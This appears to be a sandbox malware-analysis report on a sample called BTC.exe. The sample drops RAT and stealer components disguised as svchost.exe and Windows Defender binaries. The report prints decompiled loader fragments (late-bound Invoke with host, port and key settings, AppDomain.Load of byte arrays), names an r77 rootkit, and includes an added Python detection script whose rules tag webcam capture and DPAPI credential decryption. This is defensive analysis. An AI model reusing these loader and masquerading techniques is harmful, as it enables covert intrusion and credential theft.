                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windowscodecs.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\update.exe    Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, sspicli.dll, msasn1.dll, wbemcomn.dll, amsi.dll, userenv.dll, ntmarta.dll, uxtheme.dll, windowscodecs.dll, iphlpapi.dll, dnsapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, mswsock.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, rasadhlp.dll, rasapi32.dll, rasman.dll, rtutils.dll, winhttp.dll, ondemandconnroutehelper.dll, fwpuclnt.dll, secur32.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, gpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe    Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wbemcomn.dll, amsi.dll, userenv.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, ntmarta.dll, apphelp.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, secur32.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe    Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, sspicli.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, sxs.dll, mpr.dll, scrrun.dll, linkinfo.dll, ntshrui.dll, cscapi.dll, wbemcomn.dll, amsi.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, coremessaging.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, avicap32.dll, msvfw32.dll, winmm.dll
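The "Section loaded" rows above are the same data a Sysmon Event ID 7 (Image loaded) feed would give a SOC, and the combinations are what matter: a .NET image in %AppData% that carries a Windows-component name and pulls in amsi.dll, the Schannel stack, wbemcomn.dll and finally avicap32.dll/msvfw32.dll is a managed RAT staging an in-memory payload, talking TLS, enumerating the host over WMI and opening the webcam. The script below is an added example for this report, not Joe Sandbox code; it parses the rows in the exact shape they were extracted (fused "exeSection loaded", trailing "Jump to behavior"), groups modules per image, and scores each image with a small rule set. The rule names, the scoring weights and the constructed sample subset are the author's own choices.

```python
"""Tag per-process module-load patterns from sandbox "Section loaded" lines.

Added example for this report, not Joe Sandbox code. The rule names, the
scoring and the sample subset below are the author's own choices.
"""
import re
from collections import defaultdict

# Constructed sample: a subset of this report's own "Section loaded" rows,
# kept exactly as extracted so the parser is exercised against the real shape.
SAMPLE_LINES = r"""
Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: avicap32.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: msvfw32.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: winmm.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
""".strip().splitlines()

# Lazy ".+?\.exe" stops at the ".exe" that is directly followed by the fused
# column header; lazy "\S+?\.dll" drops the "Jump to behavior" residue.
LINE_RE = re.compile(
    r"^Source:\s*(?P<image>.+?\.exe)Section loaded:\s*(?P<module>\S+?\.dll)",
    re.IGNORECASE,
)
# Paths a standard user can write to: a binary here has no business carrying
# the name of a Windows component.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\downloads\\")
LOOKALIKE_NAME = re.compile(r"svchost|windows?\s*(defender|security)|update", re.IGNORECASE)

# (tag, modules that must all be present, what that combination indicates)
MODULE_RULES = [
    ("dotnet_runtime", {"mscoree.dll"}, "managed (.NET) image"),
    ("amsi_in_dotnet", {"mscoree.dll", "amsi.dll"},
     "CLR handed content to AMSI; .NET 4.8 does this for Assembly.Load(byte[]), i.e. in-memory payload staging"),
    ("tls_client", {"schannel.dll", "ncrypt.dll"}, "Schannel TLS stack: encrypted outbound channel"),
    ("wmi_client", {"wbemcomn.dll"}, "WMI client: host and security-product enumeration"),
    ("webcam_capture", {"avicap32.dll", "msvfw32.dll"}, "Video for Windows capture APIs: webcam access"),
    ("audio_api", {"winmm.dll"}, "winmm (waveIn*): possible microphone capture, weak on its own"),
    ("dpapi_unprotect", {"dpapi.dll"}, "DPAPI available: typical for browser/credential blob decryption"),
    ("task_scheduler", {"taskschd.dll"}, "Task Scheduler COM: scheduled-task persistence"),
]


def parse(lines):
    """Map each image path to the set of module names (lower-cased) it loaded."""
    loaded = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            loaded[m.group("image")].add(m.group("module").lower())
    return loaded


def analyze(lines):
    """Return per-image findings: modules, matched tags/notes, location flags, score."""
    results = {}
    for image, modules in parse(lines).items():
        low = image.lower()
        user_writable = any(part in low for part in USER_WRITABLE)
        basename = image.rsplit("\\", 1)[-1]
        # A system name only counts as masquerading outside the system directories.
        lookalike = bool(LOOKALIKE_NAME.search(basename)) and user_writable
        tags, notes = [], []
        for tag, needed, note in MODULE_RULES:
            if needed <= modules:
                tags.append(tag)
                notes.append(note)
        # One point per capability; two each for user-writable path and lookalike name.
        score = len(tags) + 2 * user_writable + 2 * lookalike
        results[image] = {
            "modules": sorted(modules), "tags": tags, "notes": notes,
            "user_writable": user_writable, "lookalike_name": lookalike, "score": score,
        }
    return results


def ranked(results):
    """(image, score) pairs ordered from most to least suspicious."""
    return sorted(((img, r["score"]) for img, r in results.items()), key=lambda t: -t[1])


if __name__ == "__main__":
    findings = analyze(SAMPLE_LINES)
    for image, score in ranked(findings):
        print(f"{score:>2}  {image}")
        for tag, note in zip(findings[image]["tags"], findings[image]["notes"]):
            print(f"      {tag:<16} {note}")
```

On the sample the masquerading "Windows Defender Service Host.exe" ranks first because it stacks every capability tag on top of the location and name penalties, while schtasks.exe and powershell.exe, which load taskschd.dll and dpapi.dll for legitimate reasons all day, stay at one point; the same rule set run against a full Sysmon export separates the two populations the same way.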
                            Source: C:\Windows\System32\cmd.exe    Section loaded: cmdext.dll
                            Source: C:\Windows\System32\schtasks.exe    Section loaded: kernel.appcore.dll, taskschd.dll, sspicli.dll, xmllite.dll
                            Source: C:\Windows\SysWOW64\schtasks.exe    Section loaded: kernel.appcore.dll, taskschd.dll, sspicli.dll, xmllite.dll
                            Source: C:\Windows\System32\timeout.exe    Section loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe    Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wbemcomn.dll, amsi.dll, userenv.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
                            Source: C:\Windows\SysWOW64\cmd.exe    Section loaded: cmdext.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe    Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, sspicli.dll, msasn1.dll
                            Source: C:\Windows\System32\schtasks.exe    Section loaded: kernel.appcore.dll, taskschd.dll, sspicli.dll, xmllite.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe    Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wbemcomn.dll, amsi.dll, userenv.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Users\user\Desktop\BTC.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Roaming\svchost.exe | File written: C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\BTC.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: BTC.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: BTC.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: BTC.exe | Static file information: File size 1159168 > 1048576
Source: BTC.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x109e00
Source: BTC.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: winload_prod.pdb source: Temp.txt.4.dr, Temp.txt.5.dr
Source: Binary string: ntkrnlmp.pdb source: Temp.txt.4.dr, Temp.txt.5.dr
Source: Binary string: F:\coding\r77-rootkit-master\Install\obj\Debug\Install.pdbT0n0 `0_CorExeMainmscoree.dll source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr
Source: Binary string: winload_prod.pdb\ source: Temp.txt.4.dr, Temp.txt.5.dr
Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.4.dr, Temp.txt.5.dr
Source: Binary string: D:\CopyMySelf\obj\Release\Chrome.pdbMCgC YC_CorExeMainmscoree.dll source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr
Source: Binary string: F:\coding\r77-rootkit-master\Install\obj\Debug\Install.pdb source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr
Source: Binary string: D:\CopyMySelf\obj\Release\Chrome.pdb source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr

Data Obfuscation

Source: Windows Defender Service Host.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Windows Defender Service Host.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Windows Defender Service Host.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.BTC.exe.2c80488.2.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.BTC.exe.2c80488.2.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.BTC.exe.2c80488.2.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: Cracked.exe.0.dr, ClientSocket.cs | .Net Code: Invoke System.AppDomain.Load(byte[])
Source: Windows Defender Service Host.exe.0.dr, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
Source: Windows Defender Service Host.exe.0.dr, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
Source: Windows Defender Service Host.exe.0.dr, Messages.cs | .Net Code: Memory
Source: 0.2.BTC.exe.2c80488.2.raw.unpack, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.BTC.exe.2c80488.2.raw.unpack, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.BTC.exe.2c80488.2.raw.unpack, Messages.cs | .Net Code: Memory
Source: 0.2.BTC.exe.2c8fa48.3.raw.unpack, ClientSocket.cs | .Net Code: Invoke System.AppDomain.Load(byte[])
Source: svchost.exe.0.dr | Static PE information: 0xBBAE67A1 [Sat Oct 12 02:06:25 2069 UTC]
Source: C:\Users\user\AppData\Roaming\Cracked.exe | Code function: 3_2_00007FF848F000BD pushad ; iretd 3_2_00007FF848F000C1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 4_2_0523F000 pushad ; ret 4_2_0523F001
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 4_2_0523FBF6 pushad ; retf 4_2_0523FBF9
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 4_2_05C1E330 pushad ; retf 4_2_05C1EB31
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 4_2_05C10538 push eax; ret 4_2_05C10545
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 4_2_05C11790 push eax; iretd 4_2_05C1179D
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Code function: 6_2_0159954E pushad ; retf 6_2_01599551
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Code function: 6_2_0159F528 push edx; iretd 6_2_0159F552
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | Code function: 16_2_05034E2A push eax; iretd 16_2_05034E31
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | Code function: 16_2_063742D7 push ebx; ret 16_2_063742DA
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | Code function: 16_2_06375E40 push es; ret 16_2_06375E50
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | Code function: 16_2_06375F60 push es; ret 16_2_06375F70
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | Code function: 16_2_06374C70 push es; ret 16_2_06374C80
